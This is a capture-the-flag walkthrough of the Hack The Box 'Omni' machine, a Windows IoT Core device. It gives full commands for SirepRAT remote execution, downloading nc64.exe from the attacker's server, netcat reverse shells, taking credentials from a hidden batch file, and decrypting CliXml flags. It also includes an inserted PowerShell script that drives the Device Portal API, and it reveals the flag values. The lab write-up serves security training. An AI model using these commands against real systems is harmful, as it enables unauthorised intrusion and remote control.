Hack-The-Box-walkthrough[omni]

Introduction

OS: Other
Difficulty: Easy
Points: 20
Release: 22 Aug 2020
IP: 10.10.10.204

User Blood snowscan 00 days, 01 hours, 21 mins, 02 seconds.
Root Blood snowscan 00 days, 02 hours, 01 mins, 30 seconds.


Information gathering

First, run nmap as usual:

root@kali:~# nmap -sV -p- -v --min-rate=10000 10.10.10.204
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/27%Time=5F4865C5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Browsing to port 8080 prompts for a login (HTTP basic auth, "Login ID" and password), and the page identifies itself as Windows Device Portal, so this is a Windows 10 IoT Core device. Port 5985 is WinRM, and the unrecognised service on 29820 that answers every probe with the same 16-byte blob is the Sirep test service. SafeBreach Labs' SirepRAT speaks that protocol, and the service accepts commands without any authentication.

SirepRAT's LaunchCommandWithOutput lets us run an arbitrary program on the device. That means we can run cmd.exe, call PowerShell from it and download a file with the Invoke-WebRequest cmdlet.

Download SirepRAT.

Download the 64-bit Windows netcat binary (nc64.exe).

Extract it and start a simple HTTP server in the same directory (Python 2's SimpleHTTPServer below; on Python 3 the equivalent is python -m http.server 82):

C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>python -m SimpleHTTPServer 82
Serving HTTP on 0.0.0.0 port 82 ...
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET / HTTP/1.1" 200 -
10.10.14.15 - - [28/Aug/2020 10:58:17] code 404, message File not found
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET /favicon.ico HTTP/1.1" 404 -

Now run SirepRAT from its directory:

D:\pentesttool\SirepRAT-master\SirepRAT-master>python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.15:82/nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

The new GET /nc64.exe line in the web server log confirms that the device fetched the binary:

C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>python -m SimpleHTTPServer 82
Serving HTTP on 0.0.0.0 port 82 ...
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET / HTTP/1.1" 200 -
10.10.14.15 - - [28/Aug/2020 10:58:17] code 404, message File not found
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET /favicon.ico HTTP/1.1" 404 -
10.10.10.204 - - [28/Aug/2020 11:01:04] "GET /nc64.exe HTTP/1.1" 200 -

Now get a netcat listener ready:

C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>nc64.exe -lvp 1234
listening on [any] 1234 ...

Now execute netcat on the box:

D:\pentesttool\SirepRAT-master\SirepRAT-master>python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.15 1234 -e powershell.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

HResult 0x0 means the launch succeeded. If no connection comes back, run the command again; the listener then receives a shell:

C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>nc64.exe -lvp 1234
listening on [any] 1234 ...
10.10.10.204: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.204] 49671: NO_DATA
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> pwd
pwd

Path
----
C:\windows\system32

whoami is not available on this box, but $env:UserName tells us who we are:

PS C:\windows\system32> $env:UserName
$env:UserName
omni$

We are running as omni$, the machine account (a $-suffixed name is how the SYSTEM context shows up in $env:UserName). That still does not get us user.txt or root.txt, so we need to enumerate further.

Listing directories with hidden files included (ls -Force) turns up a hidden file in the PackageManagement module folder:

PS C:\windows\system32> cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
PS C:\Program Files\WindowsPowershell\Modules\PackageManagement> ls -force
ls -force


Directory: C:\Program Files\WindowsPowershell\Modules\PackageManagement


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/26/2018 11:37 PM 1.0.0.1
-a-h-- 8/21/2020 12:56 PM 247 r.bat

The hidden r.bat is a maintenance loop: on every pass it tries to remove each member listed by net localgroup administrators (skip=6 jumps over the header lines of that output), resets the passwords of app and administrator, sleeps about three seconds with ping, and starts again. What matters for us is that both passwords sit in the script in clear text:

PS C:\Program Files\WindowsPowershell\Modules\PackageManagement> cat r.bat
cat r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

The Windows Device Portal on port 8080 accepts those credentials. Open it in a browser and log in as

app:mesh5143

Go to Processes > Run Command

Here we could run commands. Lets try to get a reverse shell.
Start a Netcat listener on machine again on different port, and then run this command.

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 3344 -e powershell.exe

The portal reports "Failed to run the command" because nc64.exe never returns, but by then the shell has already connected back to the listener.
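The same "Processes > Run Command" step driven through the Device Portal REST API instead of the browser, so it can be scripted. This is an added example and not code from the original walkthrough; target, port, credentials and the command are the walkthrough's. The following are assumptions to check against the Windows Device Portal IoT API reference before relying on them: the /api/iot/processmanagement/runcommand endpoint, its base64-encoded "command" query parameter, the "runasdefaultaccount" parameter, and the "auto-" username prefix that lets non-browser clients skip the CSRF token.

```powershell
# Added example, not from the original walkthrough.
# ASSUMED (verify in the WDP IoT API reference): endpoint path, base64 'command'
# parameter, 'runasdefaultaccount' parameter, and the 'auto-' username prefix.
$target  = '10.10.10.204'
$port    = 8080
$user    = 'app'
$pass    = 'mesh5143'
$command = 'C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 3344 -e powershell.exe'

# Basic auth header built by hand: Invoke-RestMethod -Credential only sends
# credentials after a 401 challenge, and we want the auto- prefix in the name.
$authBytes = [Text.Encoding]::ASCII.GetBytes("auto-${user}:${pass}")
$headers   = @{ Authorization = 'Basic ' + [Convert]::ToBase64String($authBytes) }

# The portal takes the command base64-encoded in the query string.
$cmdB64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
$uri    = "http://${target}:${port}/api/iot/processmanagement/runcommand" +
          "?command=$([Uri]::EscapeDataString($cmdB64))&runasdefaultaccount=false"

try {
    Invoke-RestMethod -Method Post -Uri $uri -Headers $headers -TimeoutSec 15
    Write-Host 'Portal accepted the command; check the listener.'
} catch {
    # As in the browser, the portal may report failure because nc64.exe never
    # returns. The reverse shell usually connects back regardless.
    Write-Warning "Portal returned an error: $($_.Exception.Message). Check the listener anyway."
}
```

Start the listener on 3344 before running this, exactly as for the browser version; whether the portal answers with success or an error, the shell is what counts.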

Check the username:

PS C:\windows\system32> $env:UserName
$env:UserName
app

We are App.
We can now read user.txt, but it is not the flag in clear. The file is a PowerShell CliXml export of a PSCredential object (Export-Clixml), and its password field is a DPAPI-protected SecureString, which only the account that created it, app, can decrypt on this machine. Import it as app and pull the plaintext out:

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70

That gives us the user flag.
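How a file like user.txt is made, and why it only decrypts for the account that created it, as an added example that is not part of the original walkthrough. The temp path and the stand-in secret are made up for the demo; the reading function is the walkthrough's two Import-Clixml lines with the DPAPI failure case handled.

```powershell
# Added example, not from the original walkthrough. Path and secret are demo values.

# 1. How the flag file was produced: a PSCredential piped to Export-Clixml.
#    The password is a SecureString; Export-Clixml protects it with DPAPI
#    under the current user's key, so the blob is bound to this user on this host.
$demoPath = Join-Path $env:TEMP 'demo-cred.txt'
$secret   = ConvertTo-SecureString 'not-a-real-flag' -AsPlainText -Force
New-Object System.Management.Automation.PSCredential('flag', $secret) |
    Export-Clixml -Path $demoPath

# 2. On disk it is plain XML; the password element holds a long hex DPAPI blob,
#    which is the "encrypted" content seen when user.txt is printed.
Select-String -Path $demoPath -Pattern '<SS N="Password">' |
    ForEach-Object { $_.Line.Trim().Substring(0, 60) + '...' }

# 3. Reading it back. As the creating user this returns the plaintext; as any
#    other account (omni$ in the walkthrough) DPAPI refuses, typically with
#    "Key not valid for use in specified state", and we report that instead
#    of crashing.
function Get-CliXmlPassword {
    param([Parameter(Mandatory = $true)][string]$Path)
    try {
        $cred = Import-Clixml -Path $Path
        return $cred.GetNetworkCredential().Password
    } catch {
        Write-Warning "Could not decrypt $Path as $($env:UserName): $($_.Exception.Message)"
        return $null
    }
}

Get-CliXmlPassword -Path $demoPath   # not-a-real-flag when run as the creating user
Remove-Item $demoPath
```

Get-CliXmlPassword -Path U:\Users\app\user.txt from the app shell is the walkthrough's step; the same call from the omni$ shell lands in the catch block, which is the real reason the first shell could not produce the flag.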

r.bat gave us two accounts; now use the second one, Administrator:

administrator : _1nt3rn37ofTh1nGz

Repeat the steps above for an administrator shell: log in to the portal as administrator, start a listener on a new port and run

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 3345 -e powershell.exe

root.txt is protected the same way and decrypts under the administrator account:

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d

Summary of knowledge

  • Windows IoT Core penetration with SirepRAT
  • spawning a netcat reverse shell
  • password disclosure in a script
  • Windows Device Portal command execution
  • PowerShell commands to read and decrypt a CliXml credential

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…